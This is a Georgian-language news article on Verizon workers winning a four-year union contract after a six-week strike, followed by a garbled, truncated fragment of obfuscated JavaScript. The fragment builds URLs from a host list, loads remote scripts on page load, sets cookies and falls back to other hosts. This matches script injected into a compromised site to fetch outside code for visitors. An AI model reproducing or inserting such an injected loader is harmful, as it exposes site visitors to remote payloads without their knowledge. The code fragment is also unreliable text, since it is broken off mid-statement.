მიმდინარეობს საიტის განახლება
Search
Close this search box.
Search
Close this search box.

6  კვირიანი  გაფიცვის შემდეგ “ვერიზონი”-ს თანამშრომლები გამარჯვებას აღნიშნავენ

verizon-picketers-640x3636 კვირიანი გაფიცვის შემდგომ სატელეკომუკაციო გიგანტ “ვერიზონი”-ს მუშები დიდ გამარჯვებას ზეიმობენ.  გაფიცულებმა “ვერიზონ”-თან (” VERIZON”) შეთანხმებას,  ბოლო პერიოდის ერთ-ერთი ყველაზე გრძელვადიანი პროტესტის შედეგად მიაღწიეს.

მიღწეული შედეგის  შესახებ პარასკევს საღამოს, ამერიკის შეერთებული შტატების შრომის მდივანმა  ტომას პერეზმა თავად განაცხადა. კომპანიამ ორ უდიდეს პროფკავშირულ გაერთიანებასთან, “ამერიკის კომუნიკაციაში დასაქმებულთა” და “ელექტრო მუშაკთა საერთაშორისო ძმობა”-სთან,   4 წლიანი კონტრაქტი გააფორმა.

“ვერიზონ” -ის 40 000-მდე  დასაქმებული აპრილის შუა რიცხვებში იმის გამო  გაიფიცა,  რომ დამსაქმებელი არ უზრუნველყოფდა მათ ბაზისური პირობებით, მათ შორის სამართლიანი კონტრაქტებით. ადგილი ჰქონდა პენსიის ჩამოჭრას და არაერეგისტრირებულ სამუშაო ადგილებზე არაფორმალურად ხალხის დასაქმებას.

ამერიკის “კომუნიკაციაში დასაქმებულთა პროფკავშირის” წევრებს მიაჩნიათ, რომ მიღწეული შეთანხმება  არა მარტო გაფიცული დასაქმებულების, არამედ საზოგადოებისა და მთლიანად ქვეყნის  გამარჯვებაა, წარმოადგენს მუშა ოჯახების გამარჯვებას ამერიკაში და ამტკიცებს დასაქმებულთა სიძლიერეს.

უკვე ცნობილია, რომ დასაქმებულები სამუშაოს მიმდინარე კვირიდან უბრუნდებიან.

ელექტრო მუშაკთა საერთაშორისო ძმობის პრეზიდენტის, ლონი სტეპენსონის განცხადებით: ‘’მიღწეული ე.წ ექსპერიმენტული  შეთანხმება წინ გადადგმული  და მნიშვნელოვანი ნაბიჯია ექვს კვირიანი გაფიცვის დასრულებისა და “ვერიზონში” სამუშაო პირობების გაუმჯობესებისთვის. მინდა მადლობა გადავუხადო ჩვენს წევრებს,     ვინც თავი გასწირა და ბევრი დათმო იმ შედეგისთვის რომელიც დაიდო. ეს ყველაფერი ამტკიცებს, რომ ჩვენ ერთად დგომით შეგვიძლია გავაძლიეროთ ჩვენი ოჯახები და გავაუმჯობესოთ ცხოვრება ჩვენი საზოგადოებისა და საშუალო ფენის ამერეკელებისთვის“

),i.onload=function(){this.a1649136515||(this.a1649136515=!0,”function”==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),”function”==typeof o&&o())}}},s=function(f){var u=a(f)+”/ajs/”+t+”/c/”+r(d())+”_”+(self===top?0:1)+”.js”;window.a3164427983=f,c(u,function(){o(“a2519043306”)!=f&&n(“a2519043306”,f,{expires:parseInt(“3600”)})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o(“a36677002”)!=i&&n(“a36677002”,i);var r=o(“a2519043306”);t=r?r:e[0],s(t)};f()}();
// ]]>